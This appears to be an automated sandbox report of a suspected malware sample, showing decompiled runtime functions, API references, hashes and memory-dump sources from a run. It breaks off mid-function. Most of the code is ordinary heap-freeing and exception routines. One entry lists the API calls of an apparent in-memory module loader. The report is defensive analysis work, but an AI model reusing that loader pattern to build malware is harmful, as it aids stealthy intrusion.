_free.LIBCMT ref: 0303B8B0
_free.LIBCMT ref: 0303B8E8
_free.LIBCMT ref: 0303B8EF
_free.LIBCMT ref: 0303B90C
_free.LIBCMT ref: 0303B924

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 386e5e8cb9b1e673c11d536092b87eb6c51cb45b9170557bb040f8dd3238d534
Instruction ID: 50ed6734ddf0f0a1adf2f83b1c68e772da0b7cb65d8a4ee3278bdbc5adf32339
Opcode Fuzzy Hash: 386e5e8cb9b1e673c11d536092b87eb6c51cb45b9170557bb040f8dd3238d534
Instruction Fuzzy Hash: 9C315E79A06305DFEB61EB79D844BA6B3EDFF42614F18446AE059DB290DF30E940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D86AA35, Relevance: 19.6, APIs: 13, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D86AA35(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6d877708) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6D867CC2(_t46);
							E6D86C871( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6D867CC2(_t47);
							E6D86C96F( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6D867CC2( *((intOrPtr*)(_t74 + 0x7c)));
						E6D867CC2( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6D867CC2( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6D867CC2( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6D867CC2( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6D867CC2( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6D86ABA6( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6d877648) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6D867CC2(_t31);
							E6D867CC2( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6D867CC2(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6D867CC2(_t74);
			}

0x6d86aa3d
0x6d86aa41
0x6d86aa49
0x6d86aa52
0x6d86aa57
0x6d86aa5e
0x6d86aa66
0x6d86aa6e
0x6d86aa79
0x6d86aa7f
0x6d86aa80
0x6d86aa88
0x6d86aa90
0x6d86aa9b
0x6d86aaa1
0x6d86aaa5
0x6d86aab0
0x6d86aab6
0x6d86aa57
0x6d86aab7
0x6d86aabf
0x6d86aad2
0x6d86aae5
0x6d86aaf3
0x6d86aafe
0x6d86ab03
0x6d86ab0c
0x6d86ab14
0x6d86ab15
0x6d86ab1b
0x6d86ab1e
0x6d86ab21
0x6d86ab28
0x6d86ab2a
0x6d86ab2e
0x6d86ab36
0x6d86ab3d
0x6d86ab43
0x6d86ab44
0x6d86ab44
0x6d86ab4b
0x6d86ab4d
0x6d86ab52
0x6d86ab5a
0x6d86ab5f
0x6d86ab60
0x6d86ab60
0x6d86ab63
0x6d86ab66
0x6d86ab69
0x6d86ab6c
0x6d86ab6c
0x6d86ab7c

APIs

___free_lconv_mon.LIBCMT ref: 6D86AA79

Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C88E
Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C8A0
Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C8B2
Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C8C4
Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C8D6
Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C8E8
Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C8FA
Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C90C
Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C91E
Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C930
Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C942
Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C954
Part of subcall function 6D86C871: _free.LIBCMT ref: 6D86C966

_free.LIBCMT ref: 6D86AA6E

Part of subcall function 6D867CC2: HeapFree.KERNEL32(00000000,00000000,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?), ref: 6D867CD8
Part of subcall function 6D867CC2: GetLastError.KERNEL32(?,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?,?), ref: 6D867CEA

_free.LIBCMT ref: 6D86AA90
_free.LIBCMT ref: 6D86AAA5
_free.LIBCMT ref: 6D86AAB0
_free.LIBCMT ref: 6D86AAD2
_free.LIBCMT ref: 6D86AAE5
_free.LIBCMT ref: 6D86AAF3
_free.LIBCMT ref: 6D86AAFE
_free.LIBCMT ref: 6D86AB36
_free.LIBCMT ref: 6D86AB3D
_free.LIBCMT ref: 6D86AB5A
_free.LIBCMT ref: 6D86AB72

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: f6b88d86db99aa36c96861b09ebfcb0b6474ae7e65f8983a9efb5f7106ac695b
Instruction ID: ee4d4dd06feb3a2be55e3f2adc3fd7505e559aa64ef6e10c2d870cbce6e83c28
Opcode Fuzzy Hash: f6b88d86db99aa36c96861b09ebfcb0b6474ae7e65f8983a9efb5f7106ac695b
Instruction Fuzzy Hash: A2312C31A08292AFEB219B39DD48F6A77E9EF00364F129C2AF155D6650DF74E880C770

Uniqueness

Uniqueness Score: -1.00%

Function 0304F764, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 0304F85F
type_info::operator==.LIBVCRUNTIME ref: 0304F886
___TypeMatch.LIBVCRUNTIME ref: 0304F992
CatchIt.LIBVCRUNTIME ref: 0304F9E7
IsInExceptionSpec.LIBVCRUNTIME ref: 0304FA6D
_UnwindNestedFrames.LIBCMT ref: 0304FAF4
CallUnexpected.LIBVCRUNTIME ref: 0304FB0F

Strings

csm, xrefs: 0304F79F
csm, xrefs: 0304F8BD
csm, xrefs: 0304F80C

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: e56c2110e8d1681883f59d7834123c8a7915506eff59a259606ad53ed0ecaac7
Instruction ID: 2fb04d323df2ce88dd5daef84b5edb72bf27865d30197883d2aa153296a23616
Opcode Fuzzy Hash: e56c2110e8d1681883f59d7834123c8a7915506eff59a259606ad53ed0ecaac7
Instruction Fuzzy Hash: 8EC16CB580221AEFCF55DFA4C9809AEBBB9FF44310F18416AE8416B211D731DB61CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03066442, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 0306653D
type_info::operator==.LIBVCRUNTIME ref: 03066564
___TypeMatch.LIBVCRUNTIME ref: 03066670
CatchIt.LIBVCRUNTIME ref: 030666C5
IsInExceptionSpec.LIBVCRUNTIME ref: 0306674B
_UnwindNestedFrames.LIBCMT ref: 030667D2
CallUnexpected.LIBVCRUNTIME ref: 030667ED

Strings

csm, xrefs: 0306659B
csm, xrefs: 030664EA
csm, xrefs: 0306647D

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: 1dc0012f9c07c70d5faee492c504dd24b4ba17d0f4e065b635bd4689a8213fe1
Instruction ID: 437455de5469d5040fb1867e5e286b3a37c1cac59408107905ba0c706bae3080
Opcode Fuzzy Hash: 1dc0012f9c07c70d5faee492c504dd24b4ba17d0f4e065b635bd4689a8213fe1
Instruction Fuzzy Hash: E8C17B7580235DAFCF25DFA4C8809AEBBB9BF44310F0841AAE8116B259D736D951CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03037AAF, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03037AC5

Part of subcall function 03037F3F: HeapFree.KERNEL32(00000000,00000000,?,0303727A), ref: 03037F55
Part of subcall function 03037F3F: GetLastError.KERNEL32(?,?,0303727A), ref: 03037F67

_free.LIBCMT ref: 03037AD1
_free.LIBCMT ref: 03037ADC
_free.LIBCMT ref: 03037AE7
_free.LIBCMT ref: 03037AF2
_free.LIBCMT ref: 03037AFD
_free.LIBCMT ref: 03037B08
_free.LIBCMT ref: 03037B13
_free.LIBCMT ref: 03037B1E
_free.LIBCMT ref: 03037B2C

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 117ec8358a2dafbb9cda0602a73be354d0561a856dcd5d6939cc32adeb23cab9
Instruction ID: ee83b62414a1871c2c8c7d5d4926331c372f5e1daa0bbd417bc2dd415050bf6a
Opcode Fuzzy Hash: 117ec8358a2dafbb9cda0602a73be354d0561a856dcd5d6939cc32adeb23cab9
Instruction Fuzzy Hash: 0C2194BA912208EFDB41EFA4C880DDE7BF9BF49640F4041A6B5159F120DB31EA55CB80

Uniqueness

Uniqueness Score: -1.00%

Function 030522E3, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 030522F9
_free.LIBCMT ref: 03052305
_free.LIBCMT ref: 03052310
_free.LIBCMT ref: 0305231B
_free.LIBCMT ref: 03052326
_free.LIBCMT ref: 03052331
_free.LIBCMT ref: 0305233C
_free.LIBCMT ref: 03052347
_free.LIBCMT ref: 03052352
_free.LIBCMT ref: 03052360

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b2bdb1a8e34bda54239e70590d71994a77a27cfb5aeafa729add2a7b0229828f
Instruction ID: 94e5ada16dac8f61f96ccfeb06d1c5099719359af385dd543383083219ba19ce
Opcode Fuzzy Hash: b2bdb1a8e34bda54239e70590d71994a77a27cfb5aeafa729add2a7b0229828f
Instruction Fuzzy Hash: 4B21987A94120CEFCF45EF96DC81EDE7BB9AF48240B00456AB9169F120DB31EA44DB80

Uniqueness

Uniqueness Score: -1.00%

Function 03068E6F, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03068E85
_free.LIBCMT ref: 03068E91
_free.LIBCMT ref: 03068E9C
_free.LIBCMT ref: 03068EA7
_free.LIBCMT ref: 03068EB2
_free.LIBCMT ref: 03068EBD
_free.LIBCMT ref: 03068EC8
_free.LIBCMT ref: 03068ED3
_free.LIBCMT ref: 03068EDE
_free.LIBCMT ref: 03068EEC

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e13d822b31705fabba071e32b405701268736af50b543b0c51fc7eafe0a65dcc
Instruction ID: c700ba24538bc1bb3369648204e64944799de60007897718768d3cd8dbe149c3
Opcode Fuzzy Hash: e13d822b31705fabba071e32b405701268736af50b543b0c51fc7eafe0a65dcc
Instruction Fuzzy Hash: AE21B77A912208EFCB41EF94C880DDE7BF9BF48250F0081A6F5159F164DB72EA94DB84

Uniqueness

Uniqueness Score: -1.00%

Function 6D867F22, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6D867F22(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0x6d871070;
				if(_t67 != 0x6d871070) {
					E6D867CC2(_t67);
					_t36 = _a4;
				}
				E6D867CC2( *((intOrPtr*)(_t36 + 0x3c)));
				E6D867CC2( *((intOrPtr*)(_a4 + 0x30)));
				E6D867CC2( *((intOrPtr*)(_a4 + 0x34)));
				E6D867CC2( *((intOrPtr*)(_a4 + 0x38)));
				E6D867CC2( *((intOrPtr*)(_a4 + 0x28)));
				E6D867CC2( *((intOrPtr*)(_a4 + 0x2c)));
				E6D867CC2( *((intOrPtr*)(_a4 + 0x40)));
				E6D867CC2( *((intOrPtr*)(_a4 + 0x44)));
				E6D867CC2( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6D867D4E(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6D867DB9(_t71, _t75);
			}

0x6d867f22
0x6d867f27
0x6d867f2d
0x6d867f2f
0x6d867f35
0x6d867f38
0x6d867f3d
0x6d867f40
0x6d867f44
0x6d867f4f
0x6d867f5a
0x6d867f65
0x6d867f70
0x6d867f7b
0x6d867f86
0x6d867f91
0x6d867f9f
0x6d867faa
0x6d867fb2
0x6d867fb3
0x6d867fb6
0x6d867fbc
0x6d867fc0
0x6d867fc4
0x6d867fc5
0x6d867fcf
0x6d867fd5
0x6d867fd6
0x6d867fd9
0x6d867fdf
0x6d867fe3
0x6d867fe7
0x6d867fee

APIs

_free.LIBCMT ref: 6D867F38

Part of subcall function 6D867CC2: HeapFree.KERNEL32(00000000,00000000,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?), ref: 6D867CD8
Part of subcall function 6D867CC2: GetLastError.KERNEL32(?,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?,?), ref: 6D867CEA

_free.LIBCMT ref: 6D867F44
_free.LIBCMT ref: 6D867F4F
_free.LIBCMT ref: 6D867F5A
_free.LIBCMT ref: 6D867F65
_free.LIBCMT ref: 6D867F70
_free.LIBCMT ref: 6D867F7B
_free.LIBCMT ref: 6D867F86
_free.LIBCMT ref: 6D867F91
_free.LIBCMT ref: 6D867F9F

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2325a14de87782447ae8c7d949414f517871c7ea2c1bc6085c2578f2021d169c
Instruction ID: 9f1c941229c2850acb71d08c5e5e66c2d1c3e2702bb641577a4582f3b86ea5b8
Opcode Fuzzy Hash: 2325a14de87782447ae8c7d949414f517871c7ea2c1bc6085c2578f2021d169c
Instruction Fuzzy Hash: CB21B576A04148BFCB41DFA8CC94EDE7BB9BF08354F0159A6F6159B620DB31EA44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03040913, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?), ref: 0304092C

Strings

log, xrefs: 03040989, 03040998
pow, xrefs: 030409CA, 03040A74, 03040AC1
sqrt, xrefs: 03040A6B
asin, xrefs: 03040A59
exp, xrefs: 030409AB, 03040A10
acos, xrefs: 03040A62
log10, xrefs: 0304096E, 0304097D

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 39a0655306f91d10538c74b5a03b6a5c27f2db7c5b9ac1ac496cef12ca8eb627
Instruction ID: 2c3f3e5a889d47dc28685aca7fe5d5592336df33625c189730c24307ee9d297e
Opcode Fuzzy Hash: 39a0655306f91d10538c74b5a03b6a5c27f2db7c5b9ac1ac496cef12ca8eb627
Instruction Fuzzy Hash: 81517AF090260ACBDF10DFA9D94C2AEFBB4FB45304F0945B5D681BA268CB748769CB54

Uniqueness

Uniqueness Score: -1.00%

Function 2FF119A0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E2FF119A0(void* __ecx, intOrPtr* _a4, struct HINSTANCE__** _a8, CHAR* _a12) {
				signed int _v8;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				struct HINSTANCE__* _t18;
				long _t19;
				intOrPtr* _t20;
				struct HINSTANCE__** _t28;

				_v8 = _v8 & 0x00000000;
				if( *0x2ff13028 == 0) {
					if(GetVersion() < 0) {
						GetFileAttributesW(L"???.???");
						 *0x2ff13024 = GetModuleHandleA("Unicows.dll");
					}
					 *0x2ff13028 = 1;
				}
				_t16 =  *0x2ff13024;
				if(_t16 != 0) {
					_t17 = GetProcAddress(_t16, _a12);
					_v8 = _t17;
					if(_t17 == 0) {
						goto L2;
					}
					goto L5;
				} else {
					L2:
					_t28 = _a8;
					_t18 =  *_t28;
					if(_t18 == 0) {
						_t19 = GetVersion();
						_t20 = _a4;
						if(_t19 < 0) {
							_t18 =  *((intOrPtr*)(_t20 + 8))( *((intOrPtr*)(_t20 + 0xc)));
						} else {
							_t18 =  *_t20( *((intOrPtr*)(_t20 + 4)));
						}
						if(_t18 == 0) {
							L4:
							L5:
							return _v8;
						}
						 *_t28 = _t18;
					}
					_v8 = GetProcAddress(_t18, _a12);
					goto L4;
				}
			}

0x2ff119a4
0x2ff119b7
0x2ff119ed
0x2ff11bb0
0x2ff11bc1
0x2ff11bc1
0x2ff119f3
0x2ff119f3
0x2ff119b9
0x2ff119c6
0x2ff11bcf
0x2ff119ff
0x2ff11a04
0x00000000
0x00000000
0x00000000
0x2ff119cc
0x2ff119cc
0x2ff119cd
0x2ff119d0
0x2ff119d4
0x2ff11a08
0x2ff11a0c
0x2ff11a0f
0x2ff11bd9
0x2ff11a15
0x2ff11a18
0x2ff11a18
0x2ff11a1c
0x2ff119df
0x2ff119e0
0x2ff119e6
0x2ff119e6
0x2ff11a1e
0x2ff11a1e
0x2ff119dc
0x00000000
0x2ff119dc

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 2FF119DA
GetVersion.KERNEL32(00000000,00000000,?,?,2FF11989,2FF11990,2FF1302C,?,?,2FF11AFC,DeactivateActCtx,?,2FF11B5E,00000000,?,2FF1169A), ref: 2FF119E9

Strings

Unicows.dll, xrefs: 2FF11BB6
???.???, xrefs: 2FF11BAB

Memory Dump Source

Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true

Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProcVersion
String ID: ???.???$Unicows.dll
API String ID: 2540053943-2162356649
Opcode ID: 632d210f6f14d2adedb2260f6c5cb725913026ab7f67934f2d74ef512f2fdecd
Instruction ID: 339e035084594a8562ad4747fc3758a43bbbebcd9cdbcd2a347de521d34f15a7
Opcode Fuzzy Hash: 632d210f6f14d2adedb2260f6c5cb725913026ab7f67934f2d74ef512f2fdecd
Instruction Fuzzy Hash: 1A111F32904206EFFB10DFA6C884E4BBBFEAF043A9B154556E614D2320E739D510DB61

Uniqueness

Uniqueness Score: -1.00%

Function 03031DFA, Relevance: 13.7, APIs: 9, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(000000C1,01671240,03049C68,00000145,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03032059

Part of subcall function 03031934: SetLastError.KERNEL32(0000000D,03031E28,01671240,03049C68,00000145,?,?,?,?,?,?,?,?,?,?,03031874), ref: 0303193E

GetNativeSystemInfo.KERNEL32(?,01671240,03049C68,00000145,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03031E92
VirtualAlloc.KERNEL32(10000000,0001C000,00003000,00000004,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03031EC2
VirtualAlloc.KERNEL32(00000000,0001C000,00003000,00000004,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03031EDA
GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03031EF4
RtlAllocateHeap.NTDLL(00000000), ref: 03031EFB
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03031F0E
VirtualAlloc.KERNEL32(00000000,00000400,00001000,00000004,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03031F6E
SetLastError.KERNEL32(0000045A), ref: 03032031

Part of subcall function 030321C2: GetProcessHeap.KERNEL32(00000000,00000000,03061AA8,00000000,0303203E,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03032238
Part of subcall function 030321C2: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,03031874), ref: 0303223F

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: HeapVirtual$AllocErrorLast$FreeProcess$AllocateInfoNativeSystem
String ID:
API String ID: 3990409966-0
Opcode ID: bf016e62ab59a736d3381d8da555859834f43f21af0643d44ee3ce40e2f86000
Instruction ID: 514f40557b971240b1fcfe63822767e9cd9cdfcb54bc60bf357a0606fffc8aa0
Opcode Fuzzy Hash: bf016e62ab59a736d3381d8da555859834f43f21af0643d44ee3ce40e2f86000
Instruction Fuzzy Hash: 60713138603201DFCB54EF66C984BA9B7FDBF4A344F184458E9019B286D774E81ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 2FF114E5, Relevance: 13.5, APIs: 9, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E2FF114E5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t21;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t37;

				E2FF11310(__ebx, __edi, __esi);
				_t35 = __imp___decode_pointer;
				_t16 =  *_t35( *0x2ff1307c, 0x2ff11520, 0x14);
				 *((intOrPtr*)(_t37 - 0x1c)) = _t16;
				if(_t16 != 0xffffffff) {
					L2FF125AA();
					 *(_t37 - 4) =  *(_t37 - 4) & 0x00000000;
					 *((intOrPtr*)(_t37 - 0x1c)) =  *_t35( *0x2ff1307c, 8);
					 *((intOrPtr*)(_t37 - 0x20)) =  *_t35( *0x2ff13078);
					_t36 = __imp___encode_pointer;
					_t21 =  *_t36( *((intOrPtr*)(_t37 + 8)), _t37 - 0x1c, _t37 - 0x20);
					L2FF125A4();
					 *((intOrPtr*)(_t37 - 0x24)) = _t21;
					 *0x2ff1307c =  *_t36( *((intOrPtr*)(_t37 - 0x1c)), _t21);
					 *0x2ff13078 =  *_t36( *((intOrPtr*)(_t37 - 0x20)));
					 *(_t37 - 4) = 0xfffffffe;
					E2FF11EDA(_t23);
					_t16 =  *((intOrPtr*)(_t37 - 0x24));
				} else {
					__imp___onexit( *((intOrPtr*)(_t37 + 8)));
				}
				return E2FF1153C(_t16);
			}

0x2ff114ec
0x2ff114f7
0x2ff114fd
0x2ff11500
0x2ff11506
0x2ff11e70
0x2ff11e76
0x2ff11e82
0x2ff11e8f
0x2ff11e9d
0x2ff11ea3
0x2ff11ea7
0x2ff11eac
0x2ff11eb4
0x2ff11ec1
0x2ff11ec6
0x2ff11ecd
0x2ff11ed2
0x2ff1150c
0x2ff1150f
0x2ff11515
0x2ff1151b

APIs

_decode_pointer.MSVCR90(2FF11520,00000014,2FF114DB,?), ref: 2FF114FD
_onexit.MSVCR90 ref: 2FF1150F
_lock.MSVCR90 ref: 2FF11E70
_decode_pointer.MSVCR90 ref: 2FF11E80
_decode_pointer.MSVCR90 ref: 2FF11E8B
_encode_pointer.MSVCR90(?,?,?), ref: 2FF11EA3
__dllonexit.MSVCR90 ref: 2FF11EA7
_encode_pointer.MSVCR90(?,00000000), ref: 2FF11EB2
_encode_pointer.MSVCR90(?), ref: 2FF11EBC

Memory Dump Source

Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true

Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File

Similarity

API ID: _decode_pointer_encode_pointer$__dllonexit_lock_onexit
String ID:
API String ID: 4020643893-0
Opcode ID: f8a7ec8c2702b84240aa030fc271b1d7525bfe0d13e0915ef48281983cb5b601
Instruction ID: bab6bbe327435ffce8e7ecacf3cbc93894f2426dd88f164405b515c3697afdb0
Opcode Fuzzy Hash: f8a7ec8c2702b84240aa030fc271b1d7525bfe0d13e0915ef48281983cb5b601
Instruction Fuzzy Hash: 0911BA72C10218EFEF05DFB5EC41A9F7BBAEF08364F114126E555A62A0DB396A109F60

Uniqueness

Uniqueness Score: -1.00%

Function 6D865090, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E6D865090(void* __ecx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				void* _t68;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				signed int _t95;
				char _t97;
				signed int _t103;
				signed int _t104;
				signed int _t112;
				void* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				signed int _t118;
				void* _t119;
				void* _t120;
				void* _t126;

				_t90 = _a4;
				_v5 = 0;
				_v16 = 1;
				 *_t90 = E6D86F4C7(__ecx,  *_t90);
				_t91 = _a8;
				_t6 = _t91 + 0x10; // 0x11
				_t116 = _t6;
				_t65 =  *(_t91 + 8) ^  *0x6d877014;
				_push(_t116);
				_push(_t65);
				_v20 = _t116;
				_v12 = _t65;
				E6D865050(_t114, _t116);
				E6D866223(_a12);
				_t68 = _a4;
				_t120 = _t119 + 0x10;
				_t115 =  *((intOrPtr*)(_t91 + 0xc));
				if(( *(_t68 + 4) & 0x00000066) != 0) {
					__eflags = _t115 - 0xfffffffe;
					if(_t115 != 0xfffffffe) {
